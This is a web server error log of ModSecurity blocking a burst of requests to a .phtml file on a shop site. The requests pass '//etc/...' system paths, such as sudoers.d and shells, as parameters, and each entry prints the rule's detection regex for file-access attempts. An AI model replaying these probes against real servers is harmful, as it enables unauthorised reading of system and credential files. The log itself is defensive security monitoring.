[Fri Mar 20 06:53:25.193200 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.10:41600] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFV1pVZ5mVmJwsFMhdAAAAEs"]
[Fri Mar 20 06:53:25.308743 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.22:41602] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFRCii7xarUs8iHZZugAAAgs"]
[Fri Mar 20 06:53:25.454806 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.100:41604] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFRCii7xarUs8iHZZuwAAAgM"]
[Fri Mar 20 06:53:26.219077 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.107:41618] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFuoXxyEfFpUF8f9z6QAAAVA"]
[Fri Mar 20 06:53:26.475546 2026] [:error] [pid 9818:tid 140411716749056] [client 57.141.18.123:41626] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFl1pVZ5mVmJwsFMhdQAAAEM"]
[Fri Mar 20 06:53:26.875861 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.20:41634] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFhCii7xarUs8iHZZvQAAAhM"]
[Fri Mar 20 06:53:27.208336 2026] [:error] [pid 31215:tid 140411557287680] [client 57.141.18.41:41638] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFwF0L0L-SsrnPo5aYAAAAtY"]
[Fri Mar 20 06:53:27.429356 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.44:41648] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFxCii7xarUs8iHZZvgAAAgQ"]
[Fri Mar 20 06:53:27.917980 2026] [:error] [pid 7893:tid 140411624429312] [client 57.141.18.109:41656] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFxCii7xarUs8iHZZvwAAAg4"]
[Fri Mar 20 06:53:28.255307 2026] [:error] [pid 7893:tid 140411674785536] [client 57.141.18.51:41666] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGBCii7xarUs8iHZZwAAAAgg"]
[Fri Mar 20 06:53:28.314005 2026] [:error] [pid 7893:tid 140411691570944] [client 57.141.18.113:41670] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGBCii7xarUs8iHZZwQAAAgY"]
[Fri Mar 20 06:53:28.817035 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.31:41682] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGBCii7xarUs8iHZZxAAAAgo"]
[Fri Mar 20 06:53:29.208359 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.52:41692] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGda6ubjKNq_cu4bFPAAAA0w"]
[Fri Mar 20 06:53:29.354607 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.91:41696] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGda6ubjKNq_cu4bFPQAAA1A"]
[Fri Mar 20 06:53:29.760509 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.123:41702] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGV1pVZ5mVmJwsFMhdwAAAFI"]
[Fri Mar 20 06:53:30.254463 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.6:41714] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGuoXxyEfFpUF8f9z6gAAAU8"]
[Fri Mar 20 06:53:30.267715 2026] [:error] [pid 7235:tid 140411649607424] [client 57.141.18.42:41716] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZGvqxLDW4GITHUkTXAwAAAQs"]
[Fri Mar 20 06:53:31.159003 2026] [:error] [pid 7235:tid 140411624429312] [client 57.141.18.104:41728] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZG_qxLDW4GITHUkTXBAAAAQ4"]
[Fri Mar 20 06:53:31.233004 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.91:41730] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZG_qxLDW4GITHUkTXBQAAAQw"]
[Fri Mar 20 06:53:31.628042 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.115:41742] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZG_qxLDW4GITHUkTXCAAAAQM"]
[Fri Mar 20 06:53:31.820707 2026] [:error] [pid 9818:tid 140411666392832] [client 57.141.18.63:41748] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZG11pVZ5mVmJwsFMheAAAAEk"]
[Fri Mar 20 06:53:32.311451 2026] [:error] [pid 31215:tid 140411691570944] [client 57.141.18.0:41758] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHAF0L0L-SsrnPo5aYgAAAsY"]
[Fri Mar 20 06:53:32.676114 2026] [:error] [pid 7235:tid 140411733534464] [client 57.141.18.99:41760] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHPqxLDW4GITHUkTXCgAAAQE"]
[Fri Mar 20 06:53:33.160934 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.86:41772] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHfHIg5MgXLBnicPrAgAAAdg"]
[Fri Mar 20 06:53:33.518035 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.27:41780] [client 57.141.18.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHfqxLDW4GITHUkTXDAAAAQY"]
[Fri Mar 20 06:53:33.624034 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.113:41782] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHfXLqtnMIWvjpaKMfAAAAo0"]
[Fri Mar 20 06:53:34.026165 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.87:41792] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHuoXxyEfFpUF8f9z7AAAAUE"]
[Fri Mar 20 06:53:34.336191 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.81:41802] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZHvHIg5MgXLBnicPrBAAAAdM"]
